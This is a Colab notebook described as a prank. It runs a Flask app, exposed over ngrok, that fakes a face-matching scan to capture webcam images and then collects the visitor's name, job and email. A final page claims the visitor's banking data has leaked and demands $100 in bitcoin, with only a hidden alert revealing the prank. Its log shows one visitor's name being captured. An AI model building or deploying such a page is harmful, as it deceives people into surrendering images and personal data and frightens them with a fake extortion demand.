<a href="https://colab.research.google.com/github/techwithanirudh/Shared/blob/master/Vrs_Prank_Part3_0.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

In [1]:
!pip install flask_ngrok flask_cors

# New Section

In [2]:
import os

os.mkdir('/content/CapImg')
os.mkdir('/content/CapImg/templates')
os.chdir('/content/CapImg/templates')

In [33]:
with open('main.html', 'w') as main:
  main.write('''
<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <script src="https://cdn.jsdelivr.net/npm/@mediapipe/camera_utils/camera_utils.js" crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/@mediapipe/control_utils/control_utils.js" crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/@mediapipe/drawing_utils/drawing_utils.js" crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/@mediapipe/face_mesh/face_mesh.js" crossorigin="anonymous"></script>
  <style>
    html {
      background-color: gray;
    }

    .scan:hover {
      background-color: #555;
    }

    .input_video, .output_canvas {
      border: 5px solid white;
    }

    .txt {
      font-family: fantasy;
      font-style: oblique;
      font-weight: bold;
      font-size: x-large;
    }

    .scan {
      background-color: #008CBA; /* Green */
      border: none;
      color: white;
      padding: 15px 32px;
      text-align: center;
      text-decoration: none;
      display: inline-block;
      font-size: 16px;
      margin: 4px 2px;
      cursor: pointer;
    }

    .scan {
      display: flex;
      justify-content: space-evenly;
      box-sizing: border-box;
      width: 25%;
      font-size: 20px;
    }

    * {
      box-sizing: border-box;
    }

    input[type=text], select, textarea {
      width: 100%;
      padding: 12px;
      border: 1px solid #ccc;
      border-radius: 4px;
      resize: vertical;
    }

    label {
      padding: 12px 12px 12px 0;
      display: inline-block;
    }

    input[type=submit] {
      background-color: #4CAF50;
      color: white;
      padding: 12px 20px;
      border: none;
      border-radius: 4px;
      cursor: pointer;
      float: left;
    }

    input[type=submit]:hover {
      background-color: #45a049;
      float: left;
    }

    .done {
      border-radius: 5px;
      background-color: #f2f2f2;
      padding: 20px;
    }

    .col-25 {
      float: left;
      width: 25%;
      margin-top: 6px;
    }

    .col-75 {
      float: left;
      width: 75%;
      margin-top: 6px;
    }

    /* Clear floats after the columns */
    .row:after {
      content: "";
      display: table;
      clear: both;
    }

    /* Responsive layout - when the screen is less than 600px wide, make the two columns stack on top of each other instead of next to each other */
    @media screen and (max-width: 600px) {
      .col-25, .col-75, input[type=submit] {
        width: 100%;
        margin-top: 0;
      }
    }
  </style>
</head>

<body>
  <div class="container">
    <video class="input_video" width="640px" height="480px"></video>
    <canvas class="output_canvas" width="640px" height="480px"></canvas>    
    <p class="txt">Source Video</p>
    <div class='btn'>
      <button class="scan" onclick="uploadPhoto()">Scan</button>
    </div>
  </div>

  <div class="scanned">
    <h1 class="txt">Success your face matched</h1>
    <h3 class="txt">Enter your name to show the details</h3>
    <form action="/userName" method="POST">
      <div class="row">
        <div class="col-25">
          <label for="fname" class="txt">First Name</label>
        </div>
        <div class="col-75">
          <input type="text" id="fname" name="firstname" placeholder="Your name..">
        </div>
      </div>
      <div class="row">
        <div class="col-25">
          <label for="lname" class="txt">Last Name</label>
        </div>
        <div class="col-75">
          <input type="text" id="lname" name="lastname" placeholder="Your last name..">
        </div>
      </div>
      <div class="row">
        <div class="col-25">
          <label for="job" class="txt">Job</label>
        </div>
        <div class="col-75">
          <input type="text" id="job" name="jobname" placeholder="Your job name..">
        </div>
      </div>
      <div class="row">
        <div class="col-25">
          <label for="email" class="txt">Email</label>
        </div>
        <div class="col-75">
          <input type="text" id="email" name="emailaddr" placeholder="Your email address..">
        </div>
      </div>
      <br>
      <div class="row">
        <input type="submit" value="Submit">
      </div>
    </form>
  </div>
  <script>
    const videoElement = document.getElementsByClassName('input_video')[0];
    const canvasElement = document.getElementsByClassName('output_canvas')[0];
    const canvasCtx = canvasElement.getContext('2d');
    var scanned = document.getElementsByClassName("scanned");
    
    function onResults(results) {
      canvasCtx.save();
      canvasCtx.clearRect(0, 0, canvasElement.width, canvasElement.height);
      canvasCtx.drawImage(
          results.image, 0, 0, canvasElement.width, canvasElement.height);
      if (results.multiFaceLandmarks) {
        for (const landmarks of results.multiFaceLandmarks) {
          drawConnectors(canvasCtx, landmarks, FACEMESH_TESSELATION,
                         {color: '#C0C0C070', lineWidth: 1});
          drawConnectors(canvasCtx, landmarks, FACEMESH_RIGHT_EYE, {color: '#FF3030'});
          drawConnectors(canvasCtx, landmarks, FACEMESH_RIGHT_EYEBROW, {color: '#FF3030'});
          drawConnectors(canvasCtx, landmarks, FACEMESH_LEFT_EYE, {color: '#30FF30'});
          drawConnectors(canvasCtx, landmarks, FACEMESH_LEFT_EYEBROW, {color: '#30FF30'});
          drawConnectors(canvasCtx, landmarks, FACEMESH_FACE_OVAL, {color: '#E0E0E0'});
          drawConnectors(canvasCtx, landmarks, FACEMESH_LIPS, {color: '#E0E0E0'});
        }
      }
      canvasCtx.restore();
    }

    function hide(elements) {
      elements = elements.length ? elements : [elements];
      for (var index = 0; index < elements.length; index++) {
        elements[index].style.display = 'none';
      }
    }

    function show(elements) {
      elements = elements.length ? elements : [elements];
      for (var index = 0; index < elements.length; index++) {
        elements[index].style.display = 'block';
      }
    }

    function uploadPhoto(){
      var url = canvasElement.toDataURL("image/jpeg");
      var container = document.getElementsByClassName('container'); 
      var req = new XMLHttpRequest();
      req.open('POST', '/userImage', true);
      req.send(url); // request.data
      hide(container);
      show(scanned);
    }

    const faceMesh = new FaceMesh({locateFile: (file) => {
      return `https://cdn.jsdelivr.net/npm/@mediapipe/face_mesh/${file}`;
    }});
    faceMesh.setOptions({
      maxNumFaces: 1,
      minDetectionConfidence: 0.5,
      minTrackingConfidence: 0.5
    });
    faceMesh.onResults(onResults);
    
    const camera = new Camera(videoElement, {
      onFrame: async () => {
        await faceMesh.send({image: videoElement});
      },
      width: 640,
      height: 480
    });

    window.addEventListener("load", camera.start(), false);
    hide(scanned);
  </script>
</body>
</html>
  ''')
main.close()

In [34]:
with open('final.html', 'w') as prank_file:
  prank_file.write('''
<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
body {
  font-family: Arial, Helvetica, sans-serif;
  margin: 0;
}

html {
  box-sizing: border-box;
}

*, *:before, *:after {
  box-sizing: inherit;
}

.column {
  float: left;
  width: 33.3%;
  margin-bottom: 16px;
  padding: 0 8px;
}

.card {
  box-shadow: 0 4px 8px 0 rgba(0, 0, 0, 0.2);
  margin: 8px;
}

.container {
  padding: 0 16px;
}

.container::after, .row::after {
  content: "";
  clear: both;
  display: table;
}

.title {
  color: grey;
}

.button {
  border: none;
  outline: 0;
  display: inline-block;
  padding: 8px;
  color: white;
  background-color: #000;
  text-align: center;
  cursor: pointer;
  width: 100%;
}

.button:hover {
  background-color: #555;
}
</style>
</head>
<body>

<script>
    function prank() {
        alert('This is a prank created by anirudh');
    }
</script>

<div class="row">
    <div class="card">
        <img src="{{ imgPath }}" alt="YourImage" style="width:100%">
        <div class="container">
            <h2>{{ name }}</h2>
            <p class="title">Job: {{ job }}</p>
            <p class="title">Email: {{ email }}</p>
            <p>Your banking data has been leaked</p>
            <p>Pay 100$ OR 10000₹ on bitcion to remove the data and remove malware from your mobile</p>
            <p><button class="button" onclick="prank()">Continue</button></p>
        </div>
    </div>
</div>

</body>
</html>
  ''')
prank_file.close()

In [35]:
from flask import Flask, render_template, jsonify, request
from flask_ngrok import run_with_ngrok
from flask_cors import CORS
from IPython.display import display, Image
import sys
import base64
from PIL import Image
import io, re

app = Flask(__name__, root_path='/content/CapImg')
CORS(app)
run_with_ngrok(app)

@app.route('/')
def home():
  return render_template('main.html')

@app.route('/userName', methods=['POST'])
def getName():
  global name_data
  data = request.form
  first_name = str(data['firstname'])
  last_name = str(data['lastname'])
  job_name = str(data['jobname'])
  email_addr = str(data['emailaddr'])
  full_name = first_name + ' ' + last_name
  full_name = full_name.title()
  print('Name:', full_name)
  return render_template('final.html', name=full_name, imgPath=imagePath, job=job_name, email=email_addr)

def b64Convert(codec):
  base64_data = re.sub('^data:image/.+;base64,', '', codec)
  byte_data = base64.b64decode(base64_data)
  image_data = io.BytesIO(byte_data)
  img = Image.open(image_data)
  return img

@app.route('/userImage', methods=['POST'])
def getUsrImg():
  global imagePath
  img_data = request.data.decode('utf-8')
  imagePath = 'image.png'
  img = b64Convert(img_data)
  img.save(imagePath, 'png')
  return ''

app.run()

 * Serving Flask app "__main__" (lazy loading)
 * Environment: production
   Use a production WSGI server instead.
 * Debug mode: off


 * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)


 * Running on http://f19753cb41d5.ngrok.io
 * Traffic stats available on http://127.0.0.1:4040


127.0.0.1 - - [01/Apr/2021 09:08:37] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [01/Apr/2021 09:08:40] "GET /favicon.ico HTTP/1.1" 404 -
127.0.0.1 - - [01/Apr/2021 09:08:51] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [01/Apr/2021 09:10:28] "GET / HTTP/1.1" 200 -
127.0.0.1 - - [01/Apr/2021 09:10:32] "GET /favicon.ico HTTP/1.1" 404 -
127.0.0.1 - - [01/Apr/2021 09:11:03] "POST /userImage HTTP/1.1" 200 -
127.0.0.1 - - [01/Apr/2021 09:11:08] "POST /userName HTTP/1.1" 200 -


Name: Carmen Jackson


127.0.0.1 - - [01/Apr/2021 09:11:09] "GET /image.png HTTP/1.1" 404 -
127.0.0.1 - - [01/Apr/2021 09:11:24] "POST /userImage HTTP/1.1" 200 -
